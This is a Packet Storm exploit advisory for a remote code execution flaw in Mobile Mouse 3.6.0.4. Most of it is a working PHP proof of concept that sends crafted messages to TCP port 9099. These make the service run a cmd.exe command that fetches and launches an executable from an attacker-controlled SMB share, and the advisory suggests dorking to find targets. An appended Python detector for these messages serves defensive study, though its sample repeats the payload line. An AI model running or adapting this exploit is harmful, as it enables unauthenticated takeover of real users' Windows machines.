PACKETSTORM

📄 Mobile Mouse 3.6.0.4 Remote Code Execution_PACKETSTORM:214115

Description

Mobile Mouse version 3.6.0.4 remote code execution proof of concept exploit written in PHP that takes advantage of an older flaw from 2022...

Basic Information

ID PACKETSTORM:214115
Published Jan 21, 2026 at 00:00

=============================================================================================================================================
| # Title : Mobile Mouse 3.6.0.4 php Code Execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.mobilemouse.com/downloads/setup.exe |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: A remote code execution (RCE) vulnerability affects Mobile Mouse version 3.6.0.4 on Windows systems.
The flaw allows a remote attacker to execute arbitrary commands on a vulnerable machine by abusing the Mobile Mouse service listening on TCP port 9099.
By crafting specific protocol messages, an attacker can instruct the service to launch a system command that retrieves and executes a malicious payload from a remote SMB share.

[+] The provided proof of concept (PoC) is written in PHP and demonstrates how an attacker can:

Connect to a target running Mobile Mouse 3.6.0.4

Interact with the Mobile Mouse protocol

Trigger execution of a command that downloads and runs an external executable via a network share

This exploit is described as a second version or refinement of an exploit originally disclosed in September 2022, with references to Packet Storm Security advisories. The PoC assumes the attacker has already set up an SMB share to host the payload.

[+] Impact:

Successful exploitation can result in full remote code execution with the privileges of the Mobile Mouse service, potentially leading to complete system compromise.

[+] Affected platform:

Windows (tested on Windows 10 Pro, French edition)

[+] Risk level:

High, due to unauthenticated remote exploitation on a network-exposed service.

(Related: https://packetstorm.news/files/id/172071/ Related CVE numbers: )

[+] Save the code as poc.php.

[+] Usage: php script.php --target=192.168.1.100 --file=payload.exe --lhost=192.168.1.50

[+] PayLoad :

<?php

function smb_server($lhost, $file_to_serve) {
    echo "[+] SMB server functionality not implemented in PHP. You need to set up an SMB share manually.\n";
}

$help = "Mobile Mouse 3.6.0.4 Remote Code Execution";

$options = getopt("", ["target:", "file:", "lhost::"]);

if (!isset($options["target"]) || !isset($options["file"])) {
    die("Usage: php script.php --target=<Target IP> --file=<File to Upload> [--lhost=<Local IP>] \n");
}

$host = $options["target"];
$command_shell = $options["file"];
$lhost = isset($options["lhost"]) ? $options["lhost"] : "127.0.0.1";
$port = 9099;

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
    die("[-] Socket creation failed: " . socket_strerror(socket_last_error()) . "\n");
}

socket_set_option($socket, SOL_SOCKET, SO_SNDBUF, 256);

if (!socket_connect($socket, $host, $port)) {
    die("[-] Connection failed: " . socket_strerror(socket_last_error()) . "\n");
}

echo "[+] Connected to $host on port $port\n";

// Start SMB Server (Placeholder in PHP, should be done manually)
smb_server($lhost, $command_shell);

$CONN = hex2bin("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04");
socket_send($socket, $CONN, strlen($CONN), 0);

$run = socket_read($socket, 54);

$RUN = hex2bin("4b45591e3131341e721e4f505404");
socket_send($socket, $RUN, strlen($RUN), 0);

$run = socket_read($socket, 54);

sleep(1);

$payload = "cmd.exe /c start /B \\\\" . $lhost . "\\share\\" . $command_shell;
$hex_payload = bin2hex($payload);

$SHELL = hex2bin("4B45591E3130301E" . $hex_payload . "1E04" . "4b45591e2d311e454e5445521e04");
socket_send($socket, $SHELL, strlen($SHELL), 0);

$shell = socket_read($socket, 96);

echo "Take The rose...\n";

sleep(30);

socket_close($socket);
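
Detection-side view of the messages above, as an added example (not part of the original advisory or the vendor's code): a Python parser for a reassembled client-to-server stream on TCP port 9099 that flags typed text resembling a command line or UNC path. The framing (0x1E field separator, 0x04 terminator, KEY messages carrying text in the third field) is inferred from the PoC's byte strings; the regex heuristic, function names and sample streams are constructed assumptions.

```python
import re

# Framing inferred from the PoC bytes: fields split by 0x1E, messages end with 0x04.
FS, EOT = b"\x1e", b"\x04"

# Heuristic (assumption): typed text naming a UNC path or a common Windows launcher.
SUSPICIOUS = re.compile(
    rb"\\\\[^\\\s]+\\[^\\\s]+"
    rb"|\b(?:cmd|powershell|mshta|rundll32|wscript|cscript)(?:\.exe)?\b",
    re.IGNORECASE,
)

def parse_messages(stream: bytes):
    """Split a reassembled client->server byte stream into lists of fields."""
    msgs = []
    for raw in stream.split(EOT):
        if not raw:
            continue
        fields = raw.split(FS)
        if fields[-1] == b"":      # drop the empty field left by a trailing 0x1E
            fields.pop()
        msgs.append(fields)
    return msgs

def detect(stream: bytes):
    """Return one alert per KEY message whose text field looks like a command."""
    msgs = parse_messages(stream)
    alerts = []
    for i, f in enumerate(msgs):
        if len(f) >= 3 and f[0] == b"KEY" and SUSPICIOUS.search(f[2]):
            # Was the typed text submitted by an ENTER key message right after it?
            submitted = any(m[:1] == [b"KEY"] and b"ENTER" in m for m in msgs[i + 1:i + 3])
            alerts.append({"index": i, "text": f[2].decode("latin-1"), "submitted": submitted})
    return alerts

# Constructed sample streams (documentation IP range, placeholder names).
SAMPLE_ATTACK = (
    b"CONNECT\x1e\x1eexample-phone\x1eiPhone\x1e2\x1e2\x1e\x04"
    b"KEY\x1e114\x1er\x1eOPT\x04"
    b"KEY\x1e100\x1ecmd.exe /c start /B \\\\192.0.2.10\\share\\sample.exe\x1e\x04"
    b"KEY\x1e-1\x1eENTER\x1e\x04"
)
SAMPLE_BENIGN = b"KEY\x1e100\x1ehello world\x1e\x04KEY\x1e-1\x1eENTER\x1e\x04"

if __name__ == "__main__":
    for name, data in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(name, detect(data))
```

Because the service accepts these messages without authentication, restricting TCP 9099 to trusted hosts at the host firewall remains the primary control; content matching like this is a secondary signal.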



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
